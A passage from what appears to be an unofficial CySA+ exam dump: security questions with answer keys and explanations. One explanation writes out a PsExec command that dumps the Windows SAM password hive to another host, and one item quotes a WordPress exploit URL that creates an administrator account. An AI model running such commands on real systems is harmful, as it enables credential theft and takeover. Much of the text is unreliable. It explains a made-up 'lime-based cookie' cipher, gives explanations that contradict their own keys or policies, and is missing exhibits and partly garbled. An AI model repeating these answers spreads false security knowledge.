vulnerable to various attacks such as replay, modification, spoofing, or denial-of-service.

QUESTION 65
During the forensic analysis of a compromised machine, a security analyst discovers some binaries that
are exhibiting abnormal behaviors. After extracting the strings, the analyst finds unexpected content. Which
of the following is the next step the analyst should take?

A. Validate the binaries' hashes from a trusted source.

B. Use file integrity monitoring to validate the digital signature
C. Run an antivirus against the binaries to check for malware.
D. Only allow binaries on the approve list to execute.

Correct Answer: A
Explanation

Explanation/Reference:
" from a trusted source is the next step the analyst should take after discovering some binaries that are
exhibiting abnormal behaviors and finding unexpected content in their strings. A hash is a fixed-length
value that uniquely represents the contents of a file or message. By comparing the hashes of the binaries
on the compromised machine with the hashes of the original or legitimate binaries from a trusted source,
such as the software vendor or repository, the analyst can determine whether the binaries have been
modified or replaced by malicious code. If the hashes do not match, it indicates that the binaries have been
tampered with and may contain malware.

QUESTION 66
While reviewing a vulnerability assessment, an analyst notices the following issue is identified in the report:

this finding, which of the following would be most appropriate for the analyst to recommend to the network
engineer?

A. Reconfigure the device to support only connections leveraging TLSv1.2.

B. Obtain a new self-signed certificate and select AES as the hashing algorithm.
C. Replace the existing certificate with a certificate that uses only MD5 for signing.
D. Use only signed certificates with cryptographically secure certificate sources.

Correct Answer: D
Explanation

QUESTION 67
A security engineer is reviewing security products that identify malicious actions by users as part of a
company's insider threat program. Which of the following is the most appropriate product category for this
purpose?

A. SCAP
B. SOAR
C. UEBA
D. WAF

Correct Answer: C
Explanation

Explanation/Reference:
UEBA stands for User and Entity Behavior Analytics, which is a category of security products that use
machine learning and statistical analysis to identify malicious actions by users or entities on a network.
UEBA products can detect anomalous or suspicious behaviors that deviate from normal patterns or
baselines, such as data exfiltration, privilege escalation, unauthorized access, insider threats, or
compromised accounts. UEBA products can also provide alerts, reports, or recommendations for response
actions based on the detected behaviors.

QUESTION 68
Given the output below:

#nmap 7.70 scan initiated Tues, Feb 8 12:34:56 2022 as: nmap -v -Pn -p 80,8000,443 --script http-* -oA
server.out 192.168.220.42

Which of the following is being performed?

A. Cross-site scripting
B. Local file inclusion attack
C. Log4] check
D. Web server enumeration

Correct Answer: D
Explanation

Explanation/Reference:
Web server enumeration is the process of identifying information about a web server, such as its software
version, operating system, configuration, services, and vulnerabilities. This can be done using tools like
Nmap, which can scan ports and run scripts to gather information. In this question, the Nmap command is
using the -p option to scan ports 80, 8000, and 443, which are commonly used for web services. It is also
using the --script option to run scripts that start with http-*, which are related to web server enumeration.
The output file name server.out also suggests that the purpose of the scan is to enumerate web servers.
CompTIA Cybersecurity Analyst (CySA+) Certification Exam Objectives (CS0-002), page 8; https://
partners.comptia.org/docs/defaultsource/ resources/comptia-cysa-cs0-002-exam-objectives

QUESTION 69
Members of the sales team are using email to send sensitive client lists with contact information to their
personal accounts The company's AUP and code of conduct prohibits this practice.

Which of the following configuration changes would improve security and help prevent this from occurring?

A. Configure the DLP transport rules to provide deep content analysis.

B. Put employees' personal email accounts on the mail server on a blocklist.
C. Set up IPS to scan for outbound emails containing names and contact information.
D. Use Group Policy to prevent users from copying and pasting information into emails.
E. Move outbound emails containing names and contact information to a sandbox for further examination.

Correct Answer: A
Explanation

Explanation/Reference:
Data loss prevention (DLP) is a set of policies and tools that aim to prevent unauthorized disclosure of
sensitive data. DLP transport rules are rules that apply to email messages that are sent or received ".
These rules can provide deep content analysis, which means they can scan the content of email
messages and attachments for sensitive data patterns, such as client lists or contact information. If a rule
detects a violation of the DLP policy, it can take actions such as blocking, quarantining, or notifying the
sender or recipient. This would improve security and help prevent sales team members from sending
sensitive client lists to their personal accounts. CompTIA Cybersecurity Analyst (CySA+) Certification
Exam Objectives (CS0-002), page 14;
https://docs.microsoft.com/en-us/exchange/security-and-compliance/mail-flow-rules/data-lossprevention

QUESTION 70
While observing several host machines, a security analyst notices a program is overwriting data to a buffer.
Which of the following controls will best mitigate this issue?

A. Data execution prevention

B. Output encoding
C. Prepared statements
D. Parameterized queries

Correct Answer: A
Explanation

Explanation/Reference:
Data execution prevention (DEP) is a security feature that prevents code from being executed in memory
regions that are marked as data-only. This helps mitigate buffer overflow attacks, which are a type of
attack where a program overwrites data to a buffer beyond its allocated size, potentially allowing malicious
code to be executed. DEP can be implemented at the hardware or software level and can prevent
unauthorized code execution in memory buffers. CompTIA Cybersecurity Analyst (CySA+) Certification
Exam Objectives (CS0-002), page 10;
https://docs.microsoft.com/enus/windows/win32/memory/data-execution-prevention

QUESTION 71
A security analyst is logged on to a jump server to audit the system configuration and status. The
organization's policies for access to and configuration of the jump server include the following:

1. No network access is allowed to the internet.

2. SSH is only for management of the server.
3. Users must utilize their own accounts, with no direct login as an administrator.
4. Unnecessary services must be disabled.

The analyst runs netstar with elevated permissions and receives the following output:

Which of the following policies does the server violate?

A. Unnecessary services must be disabled.

B. SSH is only for management of the server.
C. No network access is allowed to the internet.
D. Users must utilize their own accounts, with no direct login as an administrator.

Correct Answer: C
Explanation

Explanation/Reference:
The server violates the policy of no network access to the internet because it has an established
connection to an external IP address (216.58.194.174) on port 443, which is used for HTTPS traffic. This
indicates that the server is communicating with a web server on the internet, which is not allowed by the
policy. The other policies are not violated because SSH is only used for management of the server (not for
accessing other devices), users are utilizing their own accounts (not logging in as an administrator), and
unnecessary services are not enabled (only SSH and HTTPS are running). CompTIA Cybersecurity
Analyst (CySA+) Certification Exam Objectives (CS0-002), page 9; https://en.wikipedia.org/ wiki/
Jump_server

QUESTION 72
An organization announces that all employees will need to work remotely for an extended period of time.
All employees will be provided with a laptop and supported hardware to facilitate this requirement. The
organization asks the information security division to reduce the risk during this time. Which of the following
is a technical control that will reduce the risk of data loss if a laptop is lost or stolen?

A. Requiring the use of the corporate VPN

B. Requiring the screen to be locked after five minutes of inactivity
C. Requiring the laptop to be locked in a cabinet when not in use
D. Requiring full disk encryption

Correct Answer: D
Explanation

Explanation/Reference:
Full disk encryption (FDE) is a technical control that encrypts all the data on a disk drive, including the
operating system and applications. FDE prevents unauthorized access to the data if the disk drive is lost or
stolen, as it requires a password or key to decrypt the data. FDE can be implemented using software or
hardware solutions and can protect data at rest on laptops and other devices. The other options are not
technical controls or do not reduce the risk of data loss if a laptop is lost or stolen. CompTIA Cybersecurity
Analyst (CySA+) Certification Exam Objectives (CS0-002), page 10;
https://docs.microsoft.com/en-us/windows/security/information-protection/bitlocker/bitlockeroverview
QUESTION 73
The management team has asked a senior security engineer to explore DLP security solutions for the
company's growing use of cloud-based storage. Which of the following is an appropriate solution to control
the sensitive data that is being stored in the cloud?

A. NAC
B. IPS
C. CASB
D. WAF

Correct Answer: C
Explanation

Explanation/Reference:
A cloud access security broker (CASB) is a security solution that monitors and controls the use of cloud-
based services and applications. A CASB can provide data loss prevention (DLP) capabilities for sensitive
data that is being stored in the cloud, such as encryption, masking, tokenization, or redaction. A CASB can
also enforce policies and compliance requirements for cloud usage, such as authentication, authorization,
auditing, and reporting. The other options are not appropriate solutions for controlling sensitive data in the
cloud. CompTIA Cybersecurity Analyst (CySA+) Certification Exam Objectives (CS0-002), page 14; https://
docs.microsoft.com/en-us/cloudapp-security/what-is-cloud-app-security

QUESTION 74
Which of the following is the BEST option to protect a web application against CSRF attacks?

A. Update the web application to the latest version.

B. Set a server-side rate limit for CSRF token generation.
C. Avoid the transmission of CSRF tokens using cookies.
D. Configure the web application to only use HTTPS and TLS 1.3.

Correct Answer: C
Explanation

Explanation/Reference:
CSRF tokens are random values that are generated by the server and included in requests that perform
state-changing actions. They are used to prevent CSRF attacks by verifying that the request originates
from a legitimate source. However, if the CSRF tokens are transmitted using cookies, they are vulnerable
to being stolen or forged by an attacker who can exploit other vulnerabilities, such as cross-site scripting
(XSS) or cookie injection. Therefore, a better option is to avoid the transmission of CSRF tokens using
cookies and use other methods, such as hidden form fields or custom HTTP headers. CompTIA
Cybersecurity Analyst (CySA+) Certification Exam Objectives (CS0-002), page 11; https:// owasp.org/
www-community/attacks/csrf

QUESTION 75
Which of the following is the greatest security concern regarding ICS?

A. The involved systems are generally hard to identify.

B. The systems are configured for automatic updates, leading to device failure.
C. The systems are oftentimes air gapped, leading to fileless malware attacks.
D. Issues on the systems cannot be reversed without rebuilding the systems.

Correct Answer: D
Explanation

Explanation/Reference:
Industrial control systems (ICS) are systems that monitor and control physical processes, such as power
generation, water treatment, manufacturing, and transportation. ICS are often critical for public safety and
national security, and therefore a prime target for cyberattacks. One of the greatest security concerns
regarding ICS is that issues on the systems cannot be reversed without rebuilding the systems. This
means that any damage or disruption caused by an attack can have long-lasting and catastrophic
consequences for the physical infrastructure and human lives. The other options are not true or not
specific to ICS. CompTIA Cybersecurity Analyst (CySA+) Certification Exam Objectives (CS0-002), page
13; https://www.us-cert.gov/ics/What-are-Industrial-Control-Systems

QUESTION 76
While reviewing system logs, a network administrator discovers the following entry:

Which of the following occurred?

A. An attempt was made to access a remote workstation.

B. The PsExec services failed to execute.
C. A remote shell failed to open.
D. A user was trying to download a password file from a remote system.

Correct Answer: D
Explanation

Explanation/Reference:
The output shows an entry from a system log that indicates a user was trying to download a password file
from a remote system using PsExec. PsExec is a command-line tool that allows users to execute
processes on remote systems. The entry shows that the u" tried to run PsExec with the following
parameters: \192.168.1.100 -u administrator -p P@ssw0rd -c cmd.exe /c type c:\windows\system32\config
\SAM > \192.168.1.101\c$\temp\sam.txt This means that the user tried to connect to the remote system
with IP address 192.168.1.100 using the username " " , copy cmd.exe to the remote system, and execute it
with "system32\config\SAM > \192.168.1" . This command attempts to read the SAM file, which contains
hashed passwords of local users, and write it to a file on another system with IP address 192.168.1.101.
CompTIA Cybersecurity Analyst (CySA+) Certification Exam Objectives (CS0- 002), page 8; https://
docs.microsoft.com/enus/sysinternals/downloads/psexec

QUESTION 77
A security analyst is analyzing the following output from the Spider tab of OWASP ZAP after a vulnerability
scan was completed:

Which of the following options can the analyst conclude based on the provided output?

A. The scanning vendor used robots to make the scanning job faster
B. The scanning job was successfully completed, and no vulnerabilities were detected
C. The scanning job did not successfully complete due to an out of scope error
D. The scanner executed a crawl process to discover pages to be assessed

Correct Answer: D
Explanation

Explanation/Reference:
The output shows the result of usi"fter a vulnerability scan was completed. The Spider tab allows users to
crawl web applications and discover pages and resources that can be assessed for vulnerabilities. The
output shows that the scanner discovered various pages under different directories, such as /admin/, /blog/
, /contact/, etc., as well as some parameters and forms that can be used for testing inputs and outputs.
CompTIA Cybersecurity Analyst (CySA+) Certification Exam Objectives (CS0-002), page 9;
https://www.zaproxy.org/docs/desktop/start/features/spider/

QUESTION 78
An organization implemented an extensive firewall access-control blocklist to prevent internal network
ranges from communicating with a list of IP addresses of known command-and-control domains A security
analyst wants to reduce the load on the firewall. Which of the following can the analyst implement to
achieve similar protection and reduce the load on the firewall?

A. A DLP system
B. DNS sinkholing
C. IP address allow list
D. An inline IDS

Correct Answer: B
Explanation

Explanation/Reference:
DNS sinkholing is a mechanism that can prevent internal network ranges from communicating with a list of
IP addresses of known command-and-control domains by returning a false or controlled IP address for
those domains. This can reduce the load on the firewall by intercepting the DNS requests before they
reach the firewall and diverting them to a sinkhole server. The other options are not relevant or effective for
this purpose. CompTIA Cybersecurity Analyst (CySA+) Certification Exam Objectives (CS0-002), page 9;
https://www.enisa.europa.eu/topics/incidentresponse/glossary/dns-sinkhole

QUESTION 79
Which of the following describes the difference between intentional and unintentional insider threats'?

A. Their access levels will be different

B. The risk factor will be the same
C. Their behavior will be different
D. The rate of occurrence will be the same

Correct Answer: C
Explanation

Explanation/Reference:
The difference between intentional and unintentional insider threats is their behavior. Intentional insider
threats are malicious actors who deliberately misuse their access to harm the organization or its assets.
Unintentional insider threats are careless or negligent users who accidentally compromise the security of
the organization or its assets. Their access levels, risk factors, and rates of occurrence may vary
depending on various factors, but their behavior is the main distinction.
Reference:
CompTIA Cybersecurity Analyst (CySA+) Certification Exam Objectives (CS0-002), page 12;
https://www.cisa.gov/sites/default/files/publications/Insider_Threat_Mitigation_Guide_508.pdf

QUESTION 80
A security analyst needs to automate the incident response process for malware infections. When the
following logs are generated, an alert email should automatically be sent within 30 minutes:
Which of the following is the best way for the analyst to automate alert generation?

A. Deploy a signature-based IDS

B. Install a UEBA-capable antivirus
C. Implement email protection with SPF
D. Create a custom rule on a SIEM

Correct Answer: D
Explanation

Explanation/Reference:
A security information and event management (SIEM) system is a tool that collects and analyzes log data
from various sources and provides alerts and reports on security incidents and events. A security analyst
can create a custom rule on a SIEM system to automate the incident response process for malware
infections. For example, the analyst can create a rule that triggers an alert email when the SIEM system
detects logs that match the criteria of malware infection, such as process name, file name, file hash, etc.
The alert email can be sent within 30 minutes or any other desired time frame. The other options are not
suitable or sufficient for this purpose. CompTIA Cybersecurity Analyst (CySA+) Certification Exam
Objectives (CS0-002), page 15;
https://www.sans.org/reading-room/whitepapers/analyst/security-information-event-managementsiem-
implementation-33969

QUESTION 81
An organization wants to consolidate a number of security technologies throughout the organization and
standardize a workflow for identifying security issues prioritizing the severity and automating a response
Which of the following would best meet the organization's needs'?

A. MaaS
B. SIEM
C. SOAR
D. CI/CD

Correct Answer: C
Explanation

Explanation/Reference:
A security orchestration, automation, and response (SOAR) system is a solution that combines various
security technologies and workflows to identify security issues, prioritize their severity, and automate a
response. A SOAR system can help an organization consolidate its security tools and processes and
standardize its workflow for incident response. The other options are not relevant or comprehensive for this
purpose. CompTIA Cybersecurity Analyst (CySA+) Certification Exam Objectives (CS0-002), page 15;
https://www.gartner.com/en/informationtechnology/glossary/security-orchestration-automation-and-
response-soar

QUESTION 82
A new prototype for a company's flagship product was leaked on the internet As a result, the management
team has locked out all USB drives Optical drive writers are not present on company computers The sales
team has been granted an exception to share sales presentation files with third parties Which of the
following would allow the IT team to determine which devices are USB enabled?

A. Asset tagging
B. Device encryption
C. Data loss prevention
D. SIEMIogs

Correct Answer: D
Explanation

Explanation/Reference:
A security information and event management (SIEM) system is a tool that collects and analyzes log data
from various sources and provides alerts and reports on security incidents and events. A SIEM system can
help the IT team to determine which devices are USB enabled by querying the log data for events related
to USB device insertion, removal, or usage. The other options are not relevant or effective for this purpose.
CompTIA Cybersecurity Analyst (CySA+) Certification Exam Objectives (CS0-002), page 15;
https://www.sans.org/reading-room/whitepapers/analyst/securityinformation-event-management-siem-
implementation-33969

QUESTION 83
A forensic analyst is conducting an investigation on a compromised server Which of the following should
the analyst do first to preserve evidence''

A. Restore damaged data from the backup media

B. Create a system timeline
C. Monitor user access to compromised systems
D. Back up all log files and audit trails

Correct Answer: D
Explanation

Explanation/Reference:
A forensic analyst is conducting an investigation on a compromised server. The first step that the analyst
should do to preserve evidence is to back up all log files and audit trails. This will ensure that the analyst
has a copy of the original data that can be used for analysis and verification. Backing up the log files and
audit trails will also prevent any tampering or modification of the evidence by the attacker or other parties.
The other options are not the first steps or may alter or destroy the evidence. CompTIA Cybersecurity
Analyst (CySA+) Certification Exam Objectives (CS0- 002), page 16; https://www.nist.gov/publications/
guide-collection-and-preservation-digital-evidence

QUESTION 84
A cybersecurity analyst is researching operational data to develop a script that will detect the presence of a
threat on corporate assets. Which of the following contains the most useful information to produce this
script?

A. API documentation
B. Protocol analysis captures
C. MITRE ATT&CK reports
D. OpenloC files

Correct Answer: C
Explanation

Explanation/Reference:
A cybersecurity analyst is researching operational data to develop a script that will detect the presence of a
threat on corporate assets. The most useful information to produce this script is MITRE ATT&CK reports.
MITRE ATT&CK is a knowledge base of adversary tactics and techniques based on real-world
observations. MITRE ATT&CK reports provide detailed information on how different threat actors operate,
what tools they use, what indicators they leave behind, and how to detect or mitigate their attacks. The
other options are not as useful or relevant for this purpose.
Reference: CompTIA Cybersecurity Analyst (CySA+) Certification Exam Objectives (CS0-002), page 9;
https://attack.mitre.org/

QUESTION 85
A security analyst is reviewing the network security monitoring logs listed below:
---------------------------------------------------------------------------
Count: 2 Event#3.3505 2020-01-30 10:40 UTC
GPL WEB SERVER robots. txt access
10.1.1.128 -> 10.0.0.10
IPVer=4 hlen=5 tos=0 dlen=269 ID=0 flags=0 offset=0 tt1=0 chksum=22704
Protocol: 6 sport=45260 => dport=80
Sec=0 Ack=0 Off=5 Res=0 Flags=******** Win=0 urp=23415 chksum=0
---------------------------------------------------------------------------
Count: 22 Event#3.3507 2020-01-30 10:40 UTC
ET WEB SPECIFIC APPS PHPStudy Remote Code Execution Backdoor
10.1.1.129 -> 10.0.0.10
IPVer=4 hen=5 tos=0 dlen=269 ID=0 flags=0 offset=0 tt1=0 chksum=22704
Protocol: 6 sport=65200 -> dport=80
Sea=0 Ack=0 off=5 Res=0 Flags=******** win=0 urp=26814 chksum=0
---------------------------------------------------------------------------
Count: 30 Event#3.3522 2020-01-30 10:40 UTC
ET WEB SERVER WEB-PHP phpinfo access
10.1.1.130 -> 10.0.0.10
IPVer=4 hen=5 tos=0 dlen=269 ID=0 flags=0 offset=0 tt1=0 chksum=22704
Protocol: 6 sport=58175 -> dport=80
Sec=0 Ack=0 Off=5 Res=0 Flags=******** win=0 urp=22875 chksum=0
---------------------------------------------------------------------------
Count: 22 Event#3.3728 2020-01-30 10:40 UTC
GPL WEB SERVER 403 Forbidden
10.0.0.10 -> 10.1.1.129
IPVer=4 hen=5 tos=0 dlen=533 ID=0 flags=0 offset=0 tt1=0 chksum=20471
Protocol: 6 sport=80 -> dport=65200
Sea=0 Ack=0 Off=5 Res=0 Flags=******** win=0 urp=59638 chksum=0
---------------------------------------------------------------------------
Which of the following is the analyst MOST likely observing? (Choose two.)

A. 10.1.1.128 sent potential malicious traffic to the web server.

B. 10.1.1.128 sent malicious requests, and the alert is a false positive
C. 10.1.1.129 successfully exploited a vulnerability on the web server
D. 10.1.1.129 sent potential malicious requests to the web server
E. 10.1.1.129 can determine mat port 443 is being used
F. 10.1.1.130 can potentially obtain information about the PHP version

Correct Answer: DF
Explanation

Explanation/Reference:
A security analyst is reviewing the network security monitoring logs listed below and is most likely
observing that 10.1.1.129 sent potential malicious requests to the web server and that 10.1.1.130 can
potentially obtain information about the PHP version. The logs show that 10.1.1.129 sent two requests to
the web server with suspicious parameters, such as " " , which are commonly used for SQL injection
attacks. The logs also show that 10.1.1.130 sent a request to the " , which is a function that displays
information about the PHP configuration and environment, which can be useful for attackers to find
vulnerabilities or exploit them. CompTIA Cybersecurity Analyst (CySA+) Certification Exam Objectives
(CS0-002), page 8;
https://owasp.org/www-community/attacks/SQL_Injection;
https://www.php.net/manual/en/function.phpinfo.php

QUESTION 86
Which of the following lines from this output most likely indicates that attackers could quickly use brute
force and determine the negotiated secret session key?
A. TLS_RSA_WITH_DES_CBC_SHA 56
B. TLS_DHE_RSA_WITH_AES_128_CBC_SHA 128 DH (1024 bits)
C. TLS_RSA_WITH_AES_256_CBC_SHA 256
D. TLS_DHE_RSA_WITH_AES_256_GCM_SHA256 DH (2048 bits)

Correct Answer: B
Explanation

Explanation/Reference:
The line from this output that most likely indicates that attackers could quickly use brute force and
determine the negotiated secret session key is TLS_DHE_RSA_WITH_AES_128_CBC_SHA 128 DH
(1024 bits). This line indicates that the cipher suite uses Diffie-Hellman ephemeral (DHE) key exchange
with RSA authentication, AES 128-bit encryption with cipher block chaining (CBC) mode, and SHA-1
hashing. The DHE key exchange uses a 1024-bit Diffie-Hellman group, which is considered too weak for
modern security standards and can be broken by attackers using sufficient computing power. The other
lines indicate stronger cipher suites that use longer key lengths or more secure algorithms. CompTIA
Cybersecurity Analyst (CySA+) Certification Exam Objectives (CS0- 002), page 9; https://
learn.microsoft.com/en-us/windows/win32/secauthn/cipher-suites-in-schannel

QUESTION 87
A risk assessment concludes that the perimeter network has the highest potential for compromise by an
attacker, and it is labeled as a critical risk environment. Which of the following is a valid compensating
control to reduce the volume of valuable information in the perimeter network that an attacker could gain
using active reconnaissance techniques?

A. A control that demonstrates that all systems authenticate using the approved authentication method
B. A control that demonstrates that access to a system is only allowed by using SSH
C. A control that demonstrates that firewall rules are peer reviewed for accuracy and approved before
 deployment
D. A control that demonstrates that the network security policy is reviewed and updated yearly

Correct Answer: C
Explanation

Explanation/Reference:
A valid compensating control to reduce the volume of valuable information in the perimeter network that an
attacker could gain using active reconnaissance techniques is a control that demonstrates that firewall
rules are peer reviewed for accuracy and approved before deployment. This control can help ensure that
the firewall rules are configured correctly and securely, and that they do not allow unnecessary or
unauthorized access to the perimeter network. The other options are not compensating controls or do not
address the risk of active reconnaissance. CompTIA Cybersecurity Analyst (CySA+) Certification Exam
Objectives (CS0-002), page 14; https://www.isaca.org/resources/isaca-journal/issues6/volume-3/
compensating-controls

QUESTION 88
An analyst received an alert regarding an application spawning a suspicious command shell process Upon
further investigation, the analyst observes the following registry change occurring immediately after the
suspicious event:

Which of the following was the suspicious event able to accomplish?

A. Impair defenses.
B. Establish persistence.
C. Bypass file access controls.
D. Implement beaconing.

Correct Answer: A
Explanation

QUESTION 89
A technician working at company.com received the following email:
After looking at the above communication, which of the following should the technician recommend to the
security team to prevent exposure of sensitive information and reduce the risk of corporate data being
stored on non-corporate assets?

A. Forwarding of corporate email should be disallowed by the company.

B. A VPN should be used to allow technicians to troubleshoot computer issues securely.
C. An email banner should be implemented to identify emails coming from external sources.
D. A rule should be placed on the DLP to flag employee IDs and serial numbers.

Correct Answer: C
Explanation

Explanation/Reference:
An email banner is a message that is added to the top or bottom of an email to provide some information
or warning to the recipient. An email banner should be implemented to identify emails coming from external
sources to prevent exposure of sensitive information and reduce the risk of corporate data being stored on
non-corporate assets. An email banner can help employees recognize phishing or spoofing attempts and
avoid clicking on malicious links or attachments. It can also remind employees not to share confidential
information with external parties or forward corporate emails to personal accounts. The other options are
not relevant or effective for this purpose. Reference: CompTIA Cybersecurity Analyst (CySA+) Certification
Exam Objectives (CS0-002), page 13; https://www.csoonline.com/article5970/what-is-spoofing-definition-
and-how-to-preventit.html

QUESTION 90
A company is aiming to test a new incident response plan. The management team has made it clear that
the initial test should have no impact on the environment. The company has limited resources to support
testing. Which of the following exercises would be the best approach?

A. Tabletop scenarios
B. Capture the flag
C. Red team vs. blue team
D. Unknown-environment penetration test

Correct Answer: A
Explanation
Explanation/Reference:
A tabletop scenario is an informal, discussion-based session in which a team discusses their roles and
responses during an emergency, walking through one or more example scenarios. A tabletop scenario is
the best approach for a company that wants to test a new incident response plan without impacting the
environment or using many resources. A tabletop scenario can help the company identify strengths and
weaknesses in their plan, clarify roles and responsibilities, and improve communication and coordination
among team members. The other options are more intensive and disruptive exercises that involve
simulating a real incident or attack. CompTIA Cybersecurity Analyst (CySA+) Certification Exam Objectives
(CS0-002), page 16; https://www.linkedin.com/pulse/tabletop-exercises-explained-matt-lemon-phd

QUESTION 91
Which of the following is the best reason why organizations need operational security controls?

A. To supplement areas that other controls cannot address

B. To limit physical access to areas that contain sensitive data
C. To assess compliance automatically against a secure baseline
D. To prevent disclosure by potential insider threats

Correct Answer: A
Explanation

Explanation/Reference:
Operational security controls are security measures that are implemented and executed by people rather
than by systems. Operational security controls are needed to supplement areas that other controls, such
as technical or physical controls, cannot address. For example, operational security controls can include
policies, procedures, training, awareness, audits, reviews, testing, etc. These controls can help ensure that
employees follow best practices, comply with regulations, detect and report incidents, and respond to
emergencies. The other options are not specific to operational security controls or are too narrow in scope.
CompTIA Cybersecurity Analyst (CySA+) Certification Exam Objectives (CS0- 002), page 14; https://
www.isaca.org/resources/isacajournal/issues6/volume-3/operational-security-controls

QUESTION 92
An organization has the following risk mitigation policies

Risks without compensating controls will be mitigated first it the nsk value is greater than $50,000
Other nsk mitigation will be pnontized based on risk value.

The following risks have been identified:

Which of the following is the ordei of priority for risk mitigation from highest to lowest?

A. A, C, D, B
B. B, C, D, A
C. C, B, A, D
D. C. D, A, B
E. D, C, B, A

Correct Answer: C
Explanation

Explanation/Reference:
The order of priority for risk mitigation from highest to lowest is C, B, A, D. This order is based on applying
the risk mitigation policies of the organization. According to the first policy, risks without compensating
controls will be mitigated first if the risk value is greater than $50,000. Risk C has no compensating
controls and a risk value of $75,000, so it is the highest priority. Risk B also has no compensating controls,
but a risk value of $40,000, so it is the second priority. According to the second policy, other risk mitigation
will be prioritized based on risk value. Risk A has a risk value of $60,000 and a compensating control of
encryption, so it is the third priority. Risk D has a risk value of $50,000 and a compensating control of
backup power supply, so it is the lowest priority.

QUESTION 93
A code review reveals a web application is using lime-based cookies for session management. This is a
security concern because lime-based cookies are easy to:

A. parameterize.
B. decode.
C. guess.
D. decrypt.

Correct Answer: B
Explanation

Explanation/Reference:
Lime-based cookies are a type of cookies that use lime encoding to store data in a web browser. Lime
encoding is a simple substitution cipher that replaces each character in a string with another character
based on a fixed key. Lime-based cookies are easy to decode because the key is publicly available and
the encoding algorithm is simple. Anyone who intercepts or accesses the lime-based cookies can easily
decode them and read the data stored in them. This is a security concern because lime-based cookies are
often used for session management, which means they store information about the user's identity and
preferences on a web application. If an attacker can decode the lime-based cookies, they can impersonate
the user or access their sensitive information. Reference:
https://www.dcode.fr/lime-encryption
https://www.techopedia.com/definition/1529/session-cookie

QUESTION 94
Which of the following activities is designed to handle a control failure that leads to a breach?

A. Risk assessment
B. Incident management
C. Root cause analysis
D. Vulnerability management

Correct Answer: B
Explanation

Explanation/Reference:
Incident management is a process that aims to handle a control failure that leads to a breach by restoring
normal operations as quickly as possible and minimizing the impact and damage of the incident. Incident
management involves activities such as identifying, analyzing, containing, eradicating, recovering, and
learning from security incidents. Risk assessment, root cause analysis, and vulnerability management are
other processes related to security management, but they are not designed to handle a control failure that
leads to a breach.

Reference: https://www.sans.org/reading-room/whitepapers/incident/incident-handlers-handbook-33901
Exam C

QUESTION 1
A security team conducts a lessons-learned meeting after struggling to determine who should conduct the
next steps following a security event. Which of the following should the team create to address this issue?

A. Service-level agreement
B. Change management plan
C. Incident response plan
D. Memorandum of understanding

Correct Answer: C
Explanation

Explanation/Reference:
An incident response plan outlines the procedures, roles, and responsibilities for responding to security
incidents within an organization. It provides clear guidance on how to handle different types of incidents,
including who is responsible for what actions during and after an incident.

QUESTION 2
A cybersecurity analyst notices unusual network scanning activity coming from a country that the company
does not do business with. Which of the following is the best mitigation technique?

A. Geoblock the offending source country.

B. Block the IP range of the scans at the network firewall.
C. Perform a historical trend analysis and look for similar scanning activity.
D. Block the specific IP address of the scans at the network firewall.

Correct Answer: B
Explanation

Explanation/Reference:
For the ones thinking that a whole country should get blocked, think about the CEO going on a vacation in
that country. Being unable to reach the office or the web site would probably not fly well.

QUESTION 3
An analyst has received an IPS event notification from the SIEM stating an IP address, which is known to
be malicious, has attempted to exploit a zero-day vulnerability on several web servers. The exploit
contained the following snippet:

/wp-json/trx_addons/V2/get/sc_layout?sc=wp_insert_user&role=administrator

Which of the following controls would work best to mitigate the attack represented by this snippet?

A. Limit user creation to administrators only.

B. Limit layout creation to administrators only.
C. Set the directory trx_addons to read only for all users.
D. Set the directory V2 to read only for all users.

Correct Answer: A
Explanation

Explanation/Reference:
The provided snippet represents an attempt to exploit a vulnerability using a crafted URL to target the /wp-
json/trx_addons/V2/get/sc_layout endpoint, with parameters indicating a potential attack on WordPress to
insert a user with an administrator role. To mitigate this attack, you would want to focus on preventing
unauthorized user creation and limiting access to sensitive endpoints.

QUESTION 4
A penetration tester submitted data to a form in a web application, which enabled the penetration tester to
retrieve user credentials. Which of the following should be recommended for remediation of this application
vulnerability?

A. Implementing multifactor authentication on the server OS

B. Hashing user passwords on the web application
C. Performing input validation before allowing submission
D. Segmenting the network between the users and the web server

Correct Answer: C
Explanation

Explanation/Reference:
Input validation is a critical security measure to prevent various types of web application attacks, including
SQL injection, cross-site scripting (XSS), and data manipulation. It helps ensure that user inputs are
sanitized and do not contain malicious or unexpected data.

QUESTION 5
A cybersecurity team lead is developing metrics to present in the weekly executive briefs. Executives are
interested in knowing how long it takes to stop the spread of malware that enters the network. Which of the
following metrics should the team lead include in the briefs?

A. Mean time between failures

B. Mean time to detect
C. Mean time to remediate
D. Mean time to contain

Correct Answer: D
Explanation

Explanation/Reference:
Mean time to contain is the metric that the cybersecurity team lead should include in the weekly executive
briefs, as it measures how long it takes to stop the spread of malware that enters the network. Mean time
to contain is the average time it takes to isolate and neutralize an incident or a threat, such as malware,
from the time it is detected. Mean time to contain is an important metric for evaluating the effectiveness
and efficiency of the incident response process, as well as the potential impact and damage of the incident
or threat. A lower mean time to contain indicates a faster and more successful response, which can reduce
the risk and cost of the incident or threat. Mean time to contain can also be compared with other metrics,
such as mean time to detect or mean time to remediate, to identify gaps or areas for improvement in the
incident response process.

QUESTION 6
An employee accessed a website that caused a device to become infected with invasive malware. The
incident response analyst has:

1. created the initial evidence log.

2. disabled the wireless adapter on the device.
3. interviewed the employee, who was unable to identify the website that was accessed.
4. reviewed the web proxy traffic logs.

Which of the following should the analyst do to remediate the infected device?

A. Update the system firmware and reimage the hardware.

B. Install an additional malware scanner that will send email alerts to the analyst.
C. Configure the system to use a proxy server for Internet access.
D. Delete the user profile and restore data from backup.

Correct Answer: A
Explanation

Explanation/Reference:
Updating the system firmware and reimaging the hardware is the best action to perform to remediate the
infected device, as it helps to ensure that the device is
restored to a clean and secure state and that any traces of malware are removed. Firmware is a type of
software that controls the low-level functions of a hardware device, such as a motherboard, hard drive, or
network card. Firmware can be updated or flashed to fix bugs, improve performance, or enhance security.
Reimaging is a process of erasing and restoring the data on a storage device, such as a hard drive or a
solid state drive, using an image file that contains a copy of the operating system, applications, settings,
and files. Reimaging can help to recover from system failures, data corruption, or malware infections.
Updating the system firmware and reimaging the hardware can help to remediate the infected device by
removing any malicious code or configuration changes that may have been made by the malware, as well
as restoring any missing or damaged files or settings that may have been affected by the malware. This
can help to prevent further damage, data loss, or compromise of the device or the network. The other
actions are not as effective or appropriate as updating the system firmware and reimaging the hardware,
as they do not address the root cause of the infection or ensure that the device is fully cleaned and
secured. Installing an additional malware scanner that will send email alerts to the analyst may help to
detect and remove some types of malware, but it may not be able to catch all malware variants or remove
